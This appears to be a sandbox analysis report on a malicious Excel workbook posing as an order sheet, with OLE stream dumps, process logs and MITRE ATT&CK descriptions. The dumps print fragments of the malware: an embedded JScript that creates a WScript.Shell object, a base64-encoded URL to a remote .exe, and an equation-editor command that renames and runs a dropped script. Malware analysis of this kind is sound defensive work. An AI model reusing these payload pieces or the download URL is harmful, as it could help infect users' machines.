Data Raw:	49 44 3d 22 7b 41 38 41 38 38 30 36 32 2d 45 41 30 33 2d 34 45 30 32 2d 42 41 44 33 2d 33 35 42 43 32 32 30 41 41 32 31 36 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30

Stream Path: PROJECTwm, File Type: data, Stream Size: 173

General
Stream Path:	PROJECTwm
File Type:	data
Stream Size:	173
Entropy:	3.24541252478
Base64 Encoded:	False
Data ASCII:	T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . S h e e t 4 . S . h . e . e . t . 4 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . M o d u l e 2 . M . o . d . u . l . e . 2 . . . . .
Data Raw:	54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 53 68 65 65 74 34 00 53 00 68 00 65 00 65 00 74 00 34 00 00 00 4d 6f 64 75 6c

Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4552

General
Stream Path:	VBA/_VBA_PROJECT
File Type:	data
Stream Size:	4552
Entropy:	5.06301670883
Base64 Encoded:	False
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
Data Raw:	cc 61 a6 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: VBA/__SRP_0, File Type: data, Stream Size: 2283

General
Stream Path:	VBA/__SRP_0
File Type:	data
Stream Size:	2283
Entropy:	3.3420581262
Base64 Encoded:	False
Data ASCII:	. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ P . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . J % . . 9 . . A . . J . . P . A . . . . . . . .
Data Raw:	93 4b 2a a6 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 06 00 00 00 00 00 01 00 02 00 06 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 00 00 72 55 00 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00 7e 02 00 00 00 00 00 00 7e 02 00 00 00

Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 357

General
Stream Path:	VBA/__SRP_1
File Type:	data
Stream Size:	357
Entropy:	2.80835793457
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . h w n d . . . . . . . . . . . . . . . . l p O p e r a t i o n . . . . . . . . . . . . . . . . l p F i l e . . . . . . . . . . . . . . . . l p P a r a m e t e r s . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff

Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 280

General
Stream Path:	VBA/__SRP_2
File Type:	data
Stream Size:	280
Entropy:	2.08670864085
Base64 Encoded:	False
Data ASCII:	r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	72 55 80 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 00 00 00 7e 78 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 10 00 00 00 00 00 00 00 00 00 02 00 02 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff

Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 494

General
Stream Path:	VBA/__SRP_3
File Type:	data
Stream Size:	494
Entropy:	2.08257572338
Base64 Encoded:	False
Data ASCII:	r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . A . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . Q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H . . . . . . . . . . . . . 0 . . p . . . . . . . . . . . . . . . . . . . .
Data Raw:	72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 10 00 00 00 08 00 78 00 41 09 00 00 00 00 00 00 00 00 00 00 00 00 00 70 18 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00

Stream Path: VBA/dir, File Type: data, Stream Size: 637

General
Stream Path:	VBA/dir
File Type:	data
Stream Size:	637
Entropy:	6.51431475451
Base64 Encoded:	True
Data ASCII:	. y . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . 3 Z . b . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
Data Raw:	01 79 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 33 5a 02 62 07 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

OLE File "/opt/package/joesandbox/database/analysis/345832/sample/ORDER SHEET & SPEC.xlsm"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	False
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Summary
Author:	Windows
Last Saved By:	Windows
Create Time:	2020-02-01T18:28:07Z
Last Saved Time:	2020-02-01T18:32:27Z
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Thumbnail Scaling Desired:	false
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	12.0000

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 76

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	76
Entropy:	3.09344952647
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . O L E P a c k a g e . . . . . . . . . P a c k a g e . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 0c 00 03 00 00 00 00 00 c0 00 00 00 00 00 00 46 0c 00 00 00 4f 4c 45 20 50 61 63 6b 61 67 65 00 00 00 00 00 08 00 00 00 50 61 63 6b 61 67 65 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x1Ole10Native, File Type: data, Stream Size: 16232

General
Stream Path:	\x1Ole10Native
File Type:	data
Stream Size:	16232
Entropy:	4.721058556
Base64 Encoded:	True
Data ASCII:	d ? . . . . q . C : \\ U s e r s \\ A d m i n i s t r a t o r \\ D o w n l o a d s \\ E x c e l E x p l o i t 1 . 9 4 \\ t e m p \\ q . . . . . ) . . . C : \\ U s e r s \\ A D M I N I ~ 1 \\ A p p D a t a \\ L o c a l \\ T e m p \\ 2 \\ q . . > . . . . < p a c k a g e > . . < j o b i d = " 0 0 0 1 " > . . < s c r i p t l a n g u a g e = " J S c r i p t " > . . v a r o b j s h e l l = n e w A c t i v e X O b j e c t ( " W s c r i p t . S h e l l " ) ;
Data Raw:	64 3f 00 00 02 00 71 00 43 3a 5c 55 73 65 72 73 5c 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 5c 44 6f 77 6e 6c 6f 61 64 73 5c 45 78 63 65 6c 20 45 78 70 6c 6f 69 74 20 31 2e 39 34 5c 74 65 6d 70 5c 71 00 00 00 03 00 29 00 00 00 43 3a 5c 55 73 65 72 73 5c 41 44 4d 49 4e 49 7e 31 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 32 5c 71 00 1e 3e 00 00 0d 0a 3c 70 61 63 6b 61

OLE File "/opt/package/joesandbox/database/analysis/345832/sample/ORDER SHEET & SPEC.xlsm"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	False
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Summary
Author:	Windows
Last Saved By:	Windows
Create Time:	2020-02-01T18:28:07Z
Last Saved Time:	2020-02-01T18:32:27Z
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Thumbnail Scaling Desired:	false
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	12.0000

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 76

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	76
Entropy:	3.09344952647
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . O L E P a c k a g e . . . . . . . . . P a c k a g e . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 0c 00 03 00 00 00 00 00 c0 00 00 00 00 00 00 46 0c 00 00 00 4f 4c 45 20 50 61 63 6b 61 67 65 00 00 00 00 00 08 00 00 00 50 61 63 6b 61 67 65 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x1Ole10Native, File Type: data, Stream Size: 29338

General
Stream Path:	\x1Ole10Native
File Type:	data
Stream Size:	29338
Entropy:	4.25418403894
Base64 Encoded:	True
Data ASCII:	. r . . . . x x . C : \\ U s e r s \\ A d m i n i s t r a t o r \\ D o w n l o a d s \\ E x c e l E x p l o i t 1 . 9 4 \\ t e m p \\ x x . . . . . * . . . C : \\ U s e r s \\ A D M I N I ~ 1 \\ A p p D a t a \\ L o c a l \\ T e m p \\ 2 \\ x x . G q . . . . f s d f d s f s = " a H R 0 c H M 6 L y 9 t d W x 0 a X d h c m V 0 Z W N u b 2 x v Z 2 l h L m N v b S 5 i c i 9 q c y 9 Q b 2 R h b G l y a T Q u Z X h l " ' 1 0 0 . . l i h g t 7 y 8 u o j b j v h g t d = " U G 9 k Y W x p c m k 0 L m V 4 Z Q = = "
Data Raw:	96 72 00 00 02 00 78 78 00 43 3a 5c 55 73 65 72 73 5c 41 64 6d 69 6e 69 73 74 72 61 74 6f 72 5c 44 6f 77 6e 6c 6f 61 64 73 5c 45 78 63 65 6c 20 45 78 70 6c 6f 69 74 20 31 2e 39 34 5c 74 65 6d 70 5c 78 78 00 00 00 03 00 2a 00 00 00 43 3a 5c 55 73 65 72 73 5c 41 44 4d 49 4e 49 7e 31 5c 41 70 70 44 61 74 61 5c 4c 6f 63 61 6c 5c 54 65 6d 70 5c 32 5c 78 78 00 47 71 00 00 0d 0a 66 73 64

OLE File "/opt/package/joesandbox/database/analysis/345832/sample/ORDER SHEET & SPEC.xlsm"

Indicators
Has Summary Info:	False
Application Name:	unknown
Encrypted Document:	False
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	False

Summary
Author:	Windows
Last Saved By:	Windows
Create Time:	2020-02-01T18:28:07Z
Last Saved Time:	2020-02-01T18:32:27Z
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Thumbnail Scaling Desired:	false
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	12.0000

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 102

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	102
Entropy:	1.0435456889
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 02 ce 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x1Ole, File Type: data, Stream Size: 62

General
Stream Path:	\x1Ole
File Type:	data
Stream Size:	62
Entropy:	2.77883844661
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . ! . . . . . S h e e t 2 ! O b j e c t 1 .
Data Raw:	01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 2e 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 10 00 00 00 53 68 65 65 74 32 21 4f 62 6a 65 63 74 20 31 00

Stream Path: Equation Native, File Type: data, Stream Size: 3440

General
Stream Path:	Equation Native
File Type:	data
Stream Size:	3440
Entropy:	2.54911524462
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . y V . . . T . . . . . . . . . . . . . . . c M D / c R E N % t m p % \\ q . v & . W S C r I p T . % t m p % \\ v ? . . w s f . . C . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	1c 00 00 00 01 00 b7 c1 c8 00 00 00 00 00 00 00 c8 79 56 00 b4 06 54 00 00 00 00 00 01 01 01 03 0a 0f 01 08 1d 00 63 4d 44 20 2f 63 20 52 45 4e 20 25 74 6d 70 25 5c 71 09 76 26 09 57 53 43 72 49 70 54 09 25 74 6d 70 25 5c 76 3f 2e 2e 77 73 66 20 12 0c 43 00 bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb bb

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

• EXCEL.EXE

Click to jump to process

Memory Usage

• EXCEL.EXE

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 532 Parent PID: 584

Function Logs

General

Start time:	07:30:56
Start date:	29/01/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f440000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Section Activities

Sections loaded by Windows

Process Activities

Process Information Set

Show Windows behavior

Thread Activities

Thread Created

Thread Information Set

Show Windows behavior

Memory Activities

Memory Usage Statistics

Show Windows behavior

System Activities

Language or Locale ID Queried

Show Windows behavior

Timing Activities

User Timer set

Show Windows behavior

LPC Port Activities

Chronological Activities

Disassembly

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report ORDER SHEET & SPEC.xlsm

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "/opt/package/joesandbox/database/analysis/345832/sample/ORDER SHEET & SPEC.xlsm"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: Module1.bas, Stream Size: 740

General

VBA Code Keywords

VBA Code

VBA File Name: Module2.bas, Stream Size: 119905

General

VBA Code Keywords

VBA Code

VBA File Name: Sheet1.cls, Stream Size: 991

General

VBA Code Keywords

VBA Code

VBA File Name: Sheet2.cls, Stream Size: 991

General

VBA Code Keywords

VBA Code

VBA File Name: Sheet3.cls, Stream Size: 991

General

VBA Code Keywords

VBA Code

VBA File Name: Sheet4.cls, Stream Size: 991

General